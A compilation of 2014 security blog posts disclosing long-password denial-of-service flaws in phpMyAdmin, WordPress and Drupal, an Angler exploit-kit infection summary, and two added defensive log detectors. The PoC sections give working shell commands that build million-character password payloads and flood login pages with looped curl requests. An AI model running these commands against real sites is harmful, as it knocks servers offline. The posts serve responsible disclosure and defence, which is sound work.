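Added example, not part of the original post: a small NXDOMAIN-burst detector for the behaviour just described, run over a constructed DNS log, with a per-label entropy score so that a handful of random-looking names is separated from the occasional typo or wpad lookup. The client IPs, domain names, thresholds and timestamps are constructed, not values from the PCAP.

```python
import math
from collections import defaultdict
from datetime import datetime

# Constructed DNS log: "<timestamp> <client> <qname> <rcode>". Client 10.0.0.23 shows the
# pattern from the post (several unresolvable random names in a few seconds); 10.0.0.55
# only has two ordinary failures. None of these values come from the real capture.
SAMPLE_DNS_LOG = """\
2015-11-24T16:30:01 10.0.0.23 www.example.com NOERROR
2015-11-24T16:30:02 10.0.0.23 intranet.corp.example NOERROR
2015-11-24T16:31:10 10.0.0.23 qzkwrbtyupmfxhda.com NXDOMAIN
2015-11-24T16:31:11 10.0.0.23 xjvnptqlgsrwbdzk.net NXDOMAIN
2015-11-24T16:31:12 10.0.0.23 mhcyfrkuqwxdpnlg.org NXDOMAIN
2015-11-24T16:31:14 10.0.0.23 bkvsrjqnwxytdhfz.com NXDOMAIN
2015-11-24T16:31:15 10.0.0.23 www.example.com NOERROR
2015-11-24T16:32:40 10.0.0.55 wpad.corp.example NXDOMAIN
2015-11-24T16:40:00 10.0.0.55 wwww.example.cmo NXDOMAIN
"""


def label_entropy(qname):
    """Shannon entropy in bits per character of the leftmost DNS label.
    Random DGA labels sit near log2(len); dictionary words sit well below 3.5."""
    label = qname.split(".")[0].lower()
    if not label:
        return 0.0
    counts = {}
    for ch in label:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_dns_log(text):
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, rcode = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "client": client,
                       "qname": qname, "rcode": rcode})
    return events


def nxdomain_bursts(events, window_s=60, min_failures=4, min_entropy=3.5):
    """Return {client: [random-looking NXDOMAIN names]} for every client that produced
    at least min_failures NXDOMAIN answers inside window_s seconds, where at least half
    of those names score min_entropy or more. Thresholds are assumed, not tuned."""
    per_client = defaultdict(list)
    for ev in events:
        if ev["rcode"] == "NXDOMAIN":
            per_client[ev["client"]].append(ev)
    findings = {}
    for client, fails in per_client.items():
        fails.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(fails)):
            # Slide the left edge until the window spans at most window_s seconds.
            while (fails[end]["ts"] - fails[start]["ts"]).total_seconds() > window_s:
                start += 1
            window = fails[start:end + 1]
            if len(window) < min_failures:
                continue
            random_looking = [e["qname"] for e in window
                              if label_entropy(e["qname"]) >= min_entropy]
            if len(random_looking) * 2 >= len(window):
                if len(random_looking) > len(findings.get(client, [])):
                    findings[client] = random_looking
    return findings


if __name__ == "__main__":
    for client, names in nxdomain_bursts(parse_dns_log(SAMPLE_DNS_LOG)).items():
        print(client, "possible DGA traffic:", ", ".join(names))
```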
<h2>
Conclusion </h2>
</div>
<div>
After being notified that a piece of malware had been detected on a corporate computer, we've analyzed the traffic capture provided and detected the following:</div>
<div>
<br /></div>
<div>
<ol>
<li>The user was doing Google searches related to guns.</li>
<li>After visiting some gun shops, he ended up at this web site: www.shotgunworld[.]com</li>
<li>This one had an advertisement which loaded a JavaScript file.</li>
<li>That JavaScript had an iframe which loaded the Angler EK landing page.</li>
<li>It seems the EK was successful and the computer became part of a botnet.</li>
</ol>
<div style="text-align: justify;">
<br /></div>
</div>
Javier Nieto

2014-12-11 CVE-2014-9218 phpMyAdmin DoS Proof of Concept<div style="text-align: justify;">
Assuming that enough time has passed since phpMyAdmin released the security update, we want to share our research. As you already know, we believe in responsible disclosure, and that is the reason why we didn't publish this post before.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You can read the vulnerability details in the previous <a href="http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html" target="_blank">blog post</a>. In this one, we show you the way to exploit it.</div>
<br />
<u>1 - Create the payload.</u><br />
<br />
$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s" {1..1000000} >> payload<br />
<div style="margin-left: 40px;">
<br /></div>
<u>2 - Performing the Denial of Service attack.</u><br /><br />$ for i in `seq 1 150`; do (curl --data @payload http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done<br />
<br />
<br />
Javier Nieto

2014-12-03 When cookies lead to a DoS in phpMyAdmin CVE-2014-9218<h2>
Introduction</h2>
<div style="text-align: justify;">
"phpMyAdmin is a free software tool written in <a href="http://php.net/">PHP</a>,
intended to handle the administration of <a href="http://mysql.com/">MySQL</a>
over the Web. phpMyAdmin supports a wide range of operations on MySQL,
MariaDB and Drizzle. Frequently used operations (managing databases, tables,
columns, relations, indexes, users, permissions, etc) can be performed via the
user interface, while you still have the ability to directly execute any SQL statement."</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Before going through our findings, we would like to thank the phpMyAdmin security team for their quick response and for their interest in keeping their software secure.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
My partner <a href="https://twitter.com/cor3dump3d" target="_blank">@cor3dump3d</a> from <a href="http://www.devconsole.info/" target="_blank">www.devconsole.info</a> and I believe in <a href="http://googleonlinesecurity.blogspot.com.es/2010/07/rebooting-responsible-disclosure-focus.html" target="_blank">responsible disclosure</a>; that is the reason why we waited until the phpMyAdmin security team had released a patch before revealing full details.</div>
<h2>
Affected Versions</h2>
Versions 4.0.x (prior to 4.0.10.7), 4.1.x (prior to 4.1.14.8) and 4.2.x (prior to 4.2.13.1) are affected.<br />
<br />
<span style="font-weight: normal;">More info:</span><br />
<br />
<ul>
<li><a href="http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php" target="_blank"><span style="font-weight: normal;">http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php</span></a> </li>
</ul>
<h2>
Vulnerability Details</h2>
<div style="text-align: justify;">
The phpMyAdmin vulnerability we are going to talk about is similar to, but a little bit different from and more dangerous than, the previous ones we posted some days ago: <a href="http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html" target="_blank">CVE-2014-9016</a> and <a href="http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html" target="_blank">CVE-2014-9034</a>. That <a href="http://www.behindthefirewalls.com/2014/12/cve-2014-9016-and-cve-2014-9034-PoC.html" target="_blank">Proof of Concept</a> post describes how to perform a Denial of Service against the software mentioned above by using long passwords.<br />
<br />
Now, we have discovered that phpMyAdmin is vulnerable to the same attack but this time for a different reason...<br />
<br />
Why did we say more dangerous than the previous ones? In order to take advantage of this vulnerability in Drupal and WordPress, we needed to know a valid username before launching the attack. In phpMyAdmin, <u>it is not required to know a valid username</u>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In phpMyAdmin the attack works differently, because phpMyAdmin does not maintain any user accounts: when the user logs into phpMyAdmin, it simply relays the password to MySQL, and MySQL is not affected by this vulnerability. These are the results of the MySQL login attempts:</div>
<div style="text-align: justify;">
<br />
Password length: 1000000 Total execution time in seconds: 0.018867969512939<br />
Password length: 2000000 Total execution time in seconds: 0.03835391998291<br />
Password length: 3000000 Total execution time in seconds: 0.056785106658936<br />
Password length: 4000000 Total execution time in seconds: 0.075578212738037<br />
Password length: 5000000 Total execution time in seconds: 0.09423303604126<br />
Password length: 6000000 Total execution time in seconds: 0.11118984222412<br />
Password length: 7000000 Total execution time in seconds: 0.13226509094238<br />
Password length: 8000000 Total execution time in seconds: 0.1476719379425<br />
Password length: 9000000 Total execution time in seconds: 0.16580295562744</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So, why is phpMyAdmin affected by this kind of attack?</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If we attempt a login with a valid or invalid username and a 1,000,000-character password, we obtain the error below.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRuNBLKl3Ymm2pbB5BHAeqDkb_z38MctsWarXsyww3DHdhpap8C6zxjb0Y2eVwfBOPIQ37aQhPG_3i2xgPLNrmsMoxG4Dc9sgWasaOQpu9NPscwLzEVBuNJcbIllNSfSnaO-pMY5UgndM/s1600/phpmyadmin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRuNBLKl3Ymm2pbB5BHAeqDkb_z38MctsWarXsyww3DHdhpap8C6zxjb0Y2eVwfBOPIQ37aQhPG_3i2xgPLNrmsMoxG4Dc9sgWasaOQpu9NPscwLzEVBuNJcbIllNSfSnaO-pMY5UgndM/s1600/phpmyadmin.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
* Notice that 30 seconds is the <a href="http://php.net/manual/en/function.set-time-limit.php" target="_blank">maximum time</a> a script is allowed to run before it is terminated by the parser. This helps prevent poorly written scripts from tying up the server.<br />
<br />
Researching a little further, we see that in phpMyAdmin's cookie authentication mode the password is stored, encrypted with the <a href="http://docs.phpmyadmin.net/en/latest/config.html" target="_blank">AES algorithm</a>, in a <a href="http://docs.phpmyadmin.net/en/latest/setup.html" target="_blank">temporary cookie</a>.<br />
<br />
<div id=":jn.co">
We encrypted these long strings with AES and observed that the calculation time grows with the length of the strings.</div>
<br />
Text length: 1024 ==> AES calculation time in seconds: 0.0085389614105225<br />
Text length: 10240 ==> AES calculation time in seconds: 0.069222927093506<br />
Text length: 51200 ==> AES calculation time in seconds: 0.35328578948975<br />
Text length: 102400 ==> AES calculation time in seconds: 0.72205591201782<br />
Text length: 512000 ==> AES calculation time in seconds: 3.5483829975128<br />
Text length: 1024000 ==> AES calculation time in seconds: 7.1560480594635<br />
Text length: 102400000 ==> AES calculation time in seconds: 733.4890639782</div>
<br />
<div style="text-align: justify;">
When this test was performed locally, CPU resource exhaustion was observed. Notice that the server doesn't crash because of the AES calculation alone. <u>The vulnerability appears in conjunction with Apache, because Apache waits for PHP to finish the AES calculation. In a concurrent authentication process with a valid or non-valid user and very long passwords, on the one hand PHP consumes the CPU with AES calculations, and on the other hand the Apache processes that are waiting consume the memory until the server crashes.</u><br />
<br />
The result is a Denial of Service condition caused by memory exhaustion.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Y0kbjjzxVHSi6j_aBlyZ6ijVLT-F2QgCgJ7z4VOyfTQ6LSGmqwtN4WyASKUOTiMTH6dS6gqSmpWo0cjZWaHqGpQM9Al9JyNQQOpNuMrJs0DvibNVVd18taeSNolHZKQnRnGXTssy18M/s1600/phpMyAdminCrash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Y0kbjjzxVHSi6j_aBlyZ6ijVLT-F2QgCgJ7z4VOyfTQ6LSGmqwtN4WyASKUOTiMTH6dS6gqSmpWo0cjZWaHqGpQM9Al9JyNQQOpNuMrJs0DvibNVVd18taeSNolHZKQnRnGXTssy18M/s1600/phpMyAdminCrash.png" height="222" width="400" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This problem is solved in the latest phpMyAdmin patch. <u>With this patch, the user credentials are stored only after a successful
authentication, and passwords are truncated to a length of 256.</u></div>
<h2>
How to fix</h2>
Upgrade to phpMyAdmin 4.0.10.7 or newer, or 4.1.14.8 or newer, or 4.2.13.1 or newer.
<br />
<h2>
Proof of concept</h2>
A proof of concept will be published soon. Until then, update your phpMyAdmin installations.<br />
<h2>
CVE Information</h2>
CVE-2014-9218 has been assigned to this vulnerability.<br />
<h2>
Timeline</h2>
<div style="text-align: justify;">
November 26, 2014 - We sent a complete report about the vulnerability to the phpMyAdmin security team.</div>
<br />
<div style="text-align: justify;">
November 27, 2014 - phpMyAdmin started to work on this security issue.<br />
<br />
December 3, 2014 - The phpMyAdmin security update and the security advisory are published.</div>
<h2>
References</h2>
<a href="http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html" target="_blank">http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html</a><br />
<br />
<a href="http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html" target="_blank">http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html</a><br />
<br />
<a href="http://www.devconsole.info/?p=1050" target="_blank">http://www.devconsole.info/?p=1050 </a><br />
<br />
<a href="http://www.breaksec.com/?p=6362" target="_blank">http://www.breaksec.com/?p=6362</a><br />
<br />
<a href="http://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/" target="_blank">http://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/</a><br />
<br />
Javier Nieto, 2014-12-01: CVE-2014-9016 and CVE-2014-9034 Proof of Concept<div style="text-align: justify;">
Assuming that enough time has passed since the security updates were released by WordPress and Drupal, we want to share our research. As you already know, we believe in responsible disclosure, which is why we didn't publish this post before.<br />
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="" frameborder="0" height="344" src="https://www.youtube.com/embed/MpF39GhcYKQ" width="459"></iframe></div>
<div style="text-align: center;">
Set Quality to 720p</div>
<h2 style="text-align: justify;">
Drupal Denial of Service CVE-2014-9016</h2>
<u>Generate a payload and try with a non-valid user:</u><br />
<br />
$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload<br />
<br />
$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &<br />
<br />
<u>Generate a payload and try with a valid user:</u><br />
<br />
$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload<br />
<br />
$ time curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &<br />
<br />
<u>Perform a DoS with a valid user:</u><br />
<br />
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done<br />
<h2 style="text-align: justify;">
WordPress Denial of Service CVE-2014-9034</h2>
<u>Generate a payload and try with a non-valid user:</u><br />
<br />
$ echo -n "log=NO-VALID-USER&pwd=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&wp-submit=Log In" >> no_valid_user_payload<br />
<br />
$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &<br />
<br />
<u>Generate a payload and try with a valid user:</u><br />
<br />
$ echo -n "log=admin&pwd=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&wp-submit=Log In" >> valid_user_payload<br />
<br />
$ time curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &<br />
<br />
<u>Perform a DoS with a valid user:</u><br />
<br />
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done<br />
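As an added example (not the post's code, nor the wp_drupal_timing_attack script), this is what the defender's side of the traffic above looks like in an Apache access log: it flags login POSTs with oversized request bodies, logins that run near PHP's 30-second limit, and per-IP login bursts like the 150-request loop. It assumes a custom LogFormat with mod_logio's %I and %D fields, and every log line is constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Assumed Apache LogFormat, constructed for this example:
#   "%h %t \"%r\" %>s %I %D"
# %I = bytes received including headers (mod_logio), %D = microseconds to serve.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<in_bytes>\d+) (?P<micros>\d+)$'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# Login endpoints used in the PoC above, plus phpMyAdmin's entry point (assumed path).
LOGIN_PATHS = ("/wp-login.php", "?q=user", "/user/login", "/phpmyadmin/index.php")

MAX_REQUEST_BYTES = 8192   # a login form is a few hundred bytes; WordPress 4.0.1 hashes only < 4096
SLOW_MICROS = 10_000_000   # 10 s: far above a normal login, below PHP's default 30 s limit
BURST_WINDOW_S = 60
BURST_COUNT = 20           # the PoC loop fires about four login POSTs per second


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    rec["in_bytes"] = int(rec["in_bytes"])
    rec["micros"] = int(rec["micros"])
    return rec


def is_login_post(rec):
    return rec["method"] == "POST" and any(p in rec["path"] for p in LOGIN_PATHS)


def analyze(lines):
    """Flag oversized login bodies, slow logins and per-IP login bursts.

    Lines are expected in log order (timestamps non-decreasing).
    """
    result = {"oversized": [], "slow": [], "burst": {}}
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs inside the window
    for rec in filter(None, map(parse_line, lines)):
        if not is_login_post(rec):
            continue
        if rec["in_bytes"] > MAX_REQUEST_BYTES:
            result["oversized"].append((rec["ip"], rec["path"], rec["in_bytes"]))
        if rec["micros"] >= SLOW_MICROS:
            result["slow"].append((rec["ip"], rec["path"], rec["micros"] / 1e6))
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > BURST_WINDOW_S:
            q.popleft()
        if len(q) >= BURST_COUNT:
            result["burst"][rec["ip"]] = max(result["burst"].get(rec["ip"], 0), len(q))
    return result


# Constructed sample: one legitimate client and one client replaying the PoC.
# printf "%s" {1..1000000} emits roughly 5.9 MB, hence the ~5889210-byte requests.
SAMPLE_LOG = [
    '198.51.100.10 [01/Dec/2014:06:40:01 -0800] "POST /wordpress/wp-login.php HTTP/1.1" 200 812 153210',
    '203.0.113.7 [01/Dec/2014:06:40:02 -0800] "POST /wordpress/wp-login.php HTTP/1.1" 200 5889210 29998123',
    '203.0.113.7 [01/Dec/2014:06:40:02 -0800] "POST /drupal/?q=user HTTP/1.1" 200 5889198 29997650',
    '203.0.113.7 [01/Dec/2014:06:40:03 -0800] "GET /wordpress/ HTTP/1.1" 200 402 1200',
    '198.51.100.10 [01/Dec/2014:06:40:05 -0800] "POST /wordpress/wp-login.php HTTP/1.1" 302 815 160004',
] + [
    # the `for i in seq 1 150 ... sleep 0.25` loop: four login POSTs per second
    f'203.0.113.7 [01/Dec/2014:06:41:{i // 4:02d} -0800] "POST /wordpress/wp-login.php HTTP/1.1" 200 5889210 29990000'
    for i in range(25)
]

if __name__ == "__main__":
    r = analyze(SAMPLE_LOG)
    print(f"oversized login bodies: {len(r['oversized'])}")
    print(f"slow logins (>= {SLOW_MICROS // 10**6} s): {len(r['slow'])}")
    print(f"login bursts (ip: requests per {BURST_WINDOW_S} s): {r['burst']}")
```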
<h2>
Python Code</h2>
<a href="https://github.com/c0r3dump3d/wp_drupal_timing_attack" target="_blank">https://github.com/c0r3dump3d/wp_drupal_timing_attack</a><br />
<h2>
References</h2>
<a href="http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html" target="_blank">http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html</a><br />
<br />
<a href="http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html" target="_blank">http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html</a><br />
<br />
<a href="http://www.devconsole.info/?p=1050" target="_blank">http://www.devconsole.info/?p=1050 </a><br />
<br />
<a href="https://wordpress.org/news/2014/11/wordpress-4-0-1/" target="_blank"><span style="font-weight: normal;">https://wordpress.org/news/2014/11/wordpress-4-0-1/ </span></a><br />
<br />
<a href="https://www.drupal.org/SA-CORE-2014-006" target="_blank"><span style="font-weight: normal;">https://www.drupal.org/SA-CORE-2014-006 </span></a><br />
<span style="font-weight: normal;"><br /></span>
<span style="font-weight: normal;"><a href="https://www.drupal.org/node/2378367" target="_blank">https://www.drupal.org/node/2378367</a></span><br />
<br />
<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034" target="_blank">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034</a><br />
<br />
<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016" target="_blank">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016</a><br />
Javier Nieto, 2014-11-21: WordPress Denial of Service Responsible Disclosure - Attacking with long passwords<h2>
<span style="font-weight: normal;">Introduction</span></h2>
<div style="text-align: justify;">
WordPress is the most used CMS worldwide. <span style="font-weight: normal;">According to <a href="http://w3techs.com/technologies/details/cm-wordpress/all/all" target="_blank">w3techs.com</a>, WordPress is used by 61.1% of all the websites whose content management system they know. <u>That is 23.2% of all websites.</u></span></div>
<div style="text-align: justify;">
<span style="font-weight: normal;"><br /></span></div>
<div style="text-align: justify;">
My partner <a href="https://twitter.com/cor3dump3d" target="_blank">@cor3dump3d</a> from <a href="http://www.devconsole.info/" target="_blank">www.devconsole.info</a> and I <u>believe in <a href="http://googleonlinesecurity.blogspot.com.es/2010/07/rebooting-responsible-disclosure-focus.html" target="_blank">responsible disclosure</a>, which is why we have waited until a patch was released by the WordPress security team before <a href="https://www.schneier.com/crypto-gram-0111.html" target="_blank">revealing full details</a>.</u></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Notice that this security issue is exactly the same one we talked about yesterday. Both Drupal and WordPress had the same security flaw, which is now fixed in the latest versions.</div>
<h2>
<span style="font-weight: normal;">WordPress affected versions </span></h2>
<span style="font-weight: normal;">WordPress versions prior to 4.0.1</span><br />
<br />
<span style="font-weight: normal;">More info:</span><br />
<br />
<ul>
<li><a href="https://wordpress.org/news/2014/11/wordpress-4-0-1/" target="_blank"><span style="font-weight: normal;">https://wordpress.org/news/2014/11/wordpress-4-0-1/ </span></a></li>
</ul>
<h2>
<span style="font-weight: normal;">Vulnerability Details</span></h2>
<div style="text-align: justify;">
We've been researching WordPress security and would like to share our results with you. We have discovered a vulnerability that can be used against default WordPress installations in order to:<br />
<br /></div>
<ul style="text-align: justify;">
<li> Guess usernames</li>
<li>Perform a Denial of Service </li>
</ul>
<br />
<div style="text-align: justify;">
With the scenarios below, we will show you how this attack works. When we want to log in to a WordPress site, we need to type a username and a password:<br />
<br /></div>
<div style="text-align: justify;">
<u>Scenario 1:</u></div>
<div style="text-align: justify;">
If the username doesn't exist, no password hash is calculated at all.</div>
<br />
<div style="text-align: justify;">
<u>Scenario 2:</u></div>
<div style="text-align: justify;">
If the username exists, the password hash is calculated and compared with the hash stored in the database. If the hashes match, you are granted access to the system; if not, you are rejected.</div>
<br />
<div style="text-align: justify;">
<u>Scenario 3 - Taking advantage of the vulnerability:</u><br />
<br />
<u>User guessing </u></div>
<div style="text-align: justify;">
If the username exists and the password typed is, for example, 1000000 A's, generating the hash of such a long password in order to compare it with the hash stored in the database takes much longer, and the measured response time increases. So if the delay increases, the username exists.<br />
<br />
In WordPress, the way the password hash is calculated (MD5 with a salt) using <a href="http://www.openwall.com/phpass/" target="_blank">phpass</a> means that CPU resources are heavily consumed when really long passwords are provided.</div>
<div style="text-align: justify;">
<br />
<u>Denial of service</u></div>
<div style="text-align: justify;">
If we perform several login attempts with a valid username at the same time, using long passwords, this causes a Denial of Service on the server. We observed two different scenarios in a WordPress 7.32, Apache and MySQL default installation. Depending on how many login attempts are made and the time between them, we get two different scenarios:<br />
<br /></div>
<ul style="text-align: justify;">
<li>The DoS attack crashes the entire server because RAM and swap are exhausted; the CPU is also saturated.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjADpVncRRh_V_l__A10TfppVWZPWnyVnU-uoviwY9jnnwOuctgaA2UU9r2fLxikVB3v938BVm8fSLQkmlbLtXmwz4ZOdAJ_buCA0mGnH7jjuPjfM-tTkpKMXazc_VeSJHk-QzLVJxJNTU/s1600/Wordpress_Crash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjADpVncRRh_V_l__A10TfppVWZPWnyVnU-uoviwY9jnnwOuctgaA2UU9r2fLxikVB3v938BVm8fSLQkmlbLtXmwz4ZOdAJ_buCA0mGnH7jjuPjfM-tTkpKMXazc_VeSJHk-QzLVJxJNTU/s1600/Wordpress_Crash.png" height="221" width="400" /></a></div>
<br />
<br />
<ul>
<li style="text-align: justify;">The DoS attack crashes the database.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIY2bROROzeExSjNdfbZKrDyW6oPTf46PFuEKB0eRQsmJIJXVie3Rmuv-d_MyszUaKWG2mJPxFQrYptccVNgH0J6fUS6sT3_jGQLHKe2JUZaJMZ_-bjBv9nCrmvlJo5Eo1me4VQAH2TNQ/s1600/Wordpress_Database_Crash-III.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIY2bROROzeExSjNdfbZKrDyW6oPTf46PFuEKB0eRQsmJIJXVie3Rmuv-d_MyszUaKWG2mJPxFQrYptccVNgH0J6fUS6sT3_jGQLHKe2JUZaJMZ_-bjBv9nCrmvlJo5Eo1me4VQAH2TNQ/s1600/Wordpress_Database_Crash-III.png" height="100" width="400" /></a></div>
<div style="text-align: justify;">
Notice the server doesn't crash because of the hash calculation alone. The vulnerability appears in conjunction with Apache, because Apache waits for PHP to finish the hash calculation. In a concurrent authentication process with a valid user and very long passwords, on the one hand PHP consumes the CPU with hash calculations, and on the other hand the Apache processes that are waiting consume the memory until the server or the database crashes.</div>
<br />
If the Apache configuration is optimized and tuned to the hardware resources, we are able to exhaust all available sessions quickly and hold them for 30 seconds, which produces a DoS without crashing the server or the database.<br />
<br />
Why did we say 30 seconds?<br />
<br />
30 seconds is the maximum time a script is allowed to run before it is terminated by the parser. By default, the <a href="http://php.net/manual/en/function.set-time-limit.php" target="_blank">max_execution_time</a> value is set to 30 in the php.ini config. This helps prevent poorly written scripts from tying up the server.<br />
<h2>
How to fix</h2>
<div style="text-align: justify;">
If you haven't enabled automatic updates in WordPress, do so, or install the latest version.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In the latest version, WordPress only calculates the hash for passwords shorter than 4096 characters.</div>
<h2>
Proof of Concept</h2>
<a href="http://www.behindthefirewalls.com/2014/12/cve-2014-9016-and-cve-2014-9034-PoC.html" target="_blank">http://www.behindthefirewalls.com/2014/12/cve-2014-9016-and-cve-2014-9034-PoC.html</a><br />
<h2>
CVE Information</h2>
CVE-2014-9034 has been assigned to this vulnerability.<br />
<br />
<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034" target="_blank">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034</a><br />
<h2>
References</h2>
<div id=":pv.co">
<a href="http://www.devconsole.info/?p=1050" target="_blank">http://www.devconsole.info/?p=1050</a><br />
<br /></div>
<div id=":pv.co">
<a href="http://www.devconsole.info/?p=963" target="_blank">http://www.devconsole.info/?p=963</a><br />
</div>
<div id=":pv.co">
<a href="http://www.openwall.com/phpass/" target="_blank">http://www.openwall.com/phpass/</a> </div>
<br />
<a href="http://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/" target="_blank">http://codeseekah.com/2012/04/29/timing-attacks-in-web-applications/</a><br />
<br />
<a href="https://administratosphere.wordpress.com/2011/06/16/generating-passwords-using-crypt3/" target="_blank">https://administratosphere.wordpress.com/2011/06/16/generating-passwords-using-crypt3/ </a><br />
<br />
<a href="http://www.breaksec.com/?p=6362" target="_blank">http://www.breaksec.com/?p=6362</a><br />
<br />
Javier Nieto, 2014-11-19: Drupal Denial of Service Responsible Disclosure - Attacking with long passwords<div style="text-align: justify;">
<h2>
<span style="font-weight: normal;">Introduction </span></h2>
First of all, let me introduce you to my partner <a href="https://twitter.com/cor3dump3d" target="_blank">@cor3dump3d</a> from <a href="http://www.devconsole.info/" target="_blank">www.devconsole.info</a>. We have written this post together and we hope you enjoy it. More technical information about this topic can be found in my partner's post: <a href="http://www.devconsole.info/?p=1050" target="_blank">http://www.devconsole.info/?p=1050</a><br />
<br />
Before starting with our findings, we would like to thank the <a href="https://twitter.com/drupalsecurity" target="_blank">@drupalsecurity</a> team for their quick response and for their interest in keeping Drupal secure. It is the fastest and most efficient security team we have ever dealt with: around two hours after we sent the report, we received confirmation of the vulnerability and a patch was proposed.<br />
<br />
As you already know, Drupal is an open source content management platform powering millions of websites and applications. It’s built, used, and supported by an active and diverse community of people around the world.<br />
<br />
<u>We believe in <a href="http://googleonlinesecurity.blogspot.com.es/2010/07/rebooting-responsible-disclosure-focus.html" target="_blank">responsible disclosure</a>, which is why we have waited until a patch was released by the Drupal security team before <a href="https://www.schneier.com/crypto-gram-0111.html" target="_blank">revealing full details</a>.</u></div>
<h2>
<span style="font-weight: normal;">Drupal affected versions </span></h2>
Drupal core 7.x versions prior to 7.34<br />
Secure Password Hashes 6.x-2.x versions prior to 6.x-2.1.<br />
<br />
More info:<br />
<br />
<ul>
<li><a href="https://www.drupal.org/SA-CORE-2014-006" target="_blank">Drupal Core - Moderately Critical - Multiple Vulnerabilities - SA-CORE-2014-006</a></li>
<li><a href="https://www.drupal.org/node/2378367" target="_blank">SA-CONTRIB-2014-113 - Secure Password Hashes - Denial of Service</a></li>
</ul>
<h2>
